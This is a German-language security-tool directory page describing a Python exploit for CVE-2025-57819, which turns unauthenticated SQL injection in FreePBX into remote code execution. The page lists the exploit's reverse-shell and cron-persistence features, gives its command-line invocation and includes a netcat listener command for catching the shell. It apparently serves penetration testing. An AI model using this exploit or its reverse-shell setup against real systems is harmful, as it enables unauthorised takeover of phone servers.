Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-57819-exploit — Python-Exploit für CVE-2025-57819, das FreePBX über eine nicht authentifizierte SQL-Injection angreift, um Remote-Code-Ausführung mit automatischer Reverse-Shell und cron-basierter Persistenz zu erreichen. | Kitploit
Tools/GitHubGitHub/its1zero/cve-2025-57819-exploit
PersistenzmechanismenSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubits1zero/cve-2025-57819-exploit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

cve-2025-57819-exploit

Python-Exploit für CVE-2025-57819, das FreePBX über eine nicht authentifizierte SQL-Injection angreift, um Remote-Code-Ausführung mit automatischer Reverse-Shell und cron-basierter Persistenz zu erreichen.

Repository anzeigen
vor 1 MonatNoch nicht geprüft

CVE-2025-57819 Exploit

Metadaten

  • Schweregrad: Kritisch (9.8)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Typ: Nicht authentifizierte SQL Injection → Remote Code Execution
  • Betroffene Software: FreePBX (endpoint-Modul) < 15.0.66, < 16.0.89 und < 17.0.3
  • Getestet auf: FreePBX 16.0.40.7 auf CentOS 7 mit Apache 2.4

Übersicht

Dieses Skript nutzt CVE-2025-57819 in einem verwundbaren FreePBX-Endpunkt-Modul aus. Die Schwachstelle ermöglicht SQL-Injection, die ausgenutzt wird, um schädliche Cron-Jobs einzuschleusen.

Es sind keine zusätzlichen Schritte erforderlich wie bei anderen öffentlichen Exploits, die über eine hochgeladene Webshell mit dem Ziel interagieren. Es ist ein direkter Ansatz, der Ihnen direkt Reverse-Shell-Zugriff verschafft.

Auswirkungen

Remote-Code-Ausführung wird durch SQL-Injection und Manipulation von Cron-Jobs erreicht. Eine erfolgreiche Ausnutzung führt zu einer Reverse-Shell auf dem Zielsystem. Abhängig von der Konfiguration kann dies zu einer vollständigen Kompromittierung des Systems führen.

Funktionen

  • SQL-Injection über verwundbaren AJAX-Endpunkt
  • Automatische Generierung von Reverse-Shell-Payloads
  • Persistenz durch Cron-Jobs mit minütlicher Ausführung (* * * * *)
  • Automatische Bereinigung des eingeschleusten Cron-Jobs
  • Verwendet hex-kodierte Payloads, da base64-Payloads beschädigt werden, wenn +-Zeichen als Leerzeichen interpretiert werden.

Verwendung

Führen Sie den Exploit aus, indem Sie die Ziel- und Listener-Konfiguration angeben:

root@kitploit:~
python3 cve-2025-57819.py <target> <lhost> <lport>

Parameter

  • <target>: Ziel-Hostname oder IP-Adresse (verwundbare FreePBX-Instanz)
  • <lhost>: Angreifer-IP-Adresse für Reverse-Shell-Callback
  • <lport>: Listening-Port für eingehende Verbindung

Beispiel:

root@kitploit:~
python3 cve-2025-57819.py freepbx.local 10.10.16.38 9999

Listener-Setup

Starten Sie vor der Ausführung des Exploits einen Listener:

root@kitploit:~
nc -lvnp <port>

Beispiel:

root@kitploit:~
nc -nlvp 9999

Haftungsausschluss

Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bestimmt. Die unbefugte Nutzung gegen Systeme ohne ausdrückliche Genehmigung ist illegal. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

Autor

Its1Zero - [email protected]

Referenzen

  • https://nvd.nist.gov/vuln/detail/cve-2025-57819
  • https://github.com/freepbx/security-reporting/security/advisories/ghsa-m42g-xg4c-5f3h
  • https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819
Tool herunterladen